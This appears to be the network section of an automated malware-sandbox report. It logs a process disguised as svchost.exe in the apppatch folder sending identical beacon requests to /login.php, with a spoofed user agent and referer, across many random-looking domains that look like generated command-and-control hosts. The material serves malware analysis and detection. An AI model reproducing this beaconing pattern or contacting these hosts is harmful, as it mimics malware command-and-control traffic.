                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.323843956 CEST303INHTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              68192.168.2.4563843.64.163.50806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.485250950 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.222850084 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 542
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.224190950 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.424563885 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 542
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              69192.168.2.456385188.114.96.3806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.559020996 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.143810987 CEST793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:49:00 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BGm3hUdC7VhyMOsGnNm5sfFJOun67nH6JYbhOsNQmP4ppfpzdKuwjxSv%2FCdiBuXzh5lHftl6Hof%2B3bfFT5%2BFlTNONRRshVio7oBqrvaNCLC7A67FQySSv6rOZsMIxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c97e10b8b1a0f-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                              Aug 23, 2024 18:49:02.067445993 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:49:03.182677984 CEST787INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:49:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHT4DWPliR79GKSqCkcvZWJSvcmKvlR%2FGiaugVqpltn9DTN5DJpjWk0VSdC2HBJJ1iuTTbpgoGhGMnrkKjCl7ixiGrgUvDUsh3z1WNvRgZFx4gF1eZbrIkuPVVdb5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8b7c97f43d5c1a0f-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              70192.168.2.45638644.221.84.105806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.655076981 CEST374OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.232975006 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431739|1724431621|46|3|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              71192.168.2.45638718.208.156.248806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.665987015 CEST374OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vonypom.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.226248026 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431739|1724431621|46|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              72192.168.2.456388208.100.26.245806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.715660095 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.281402111 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.282566071 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:59.413589001 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              73192.168.2.456389199.191.50.83806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.787022114 CEST306OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galyqaz.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: vsid=926vr471977221402211128
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.831562996 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:59 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Data Raw: 61 37 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: a7cd<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.832968950 CEST1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                              Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                              Aug 23, 2024 18:49:00.832982063 CEST1236INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                              Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
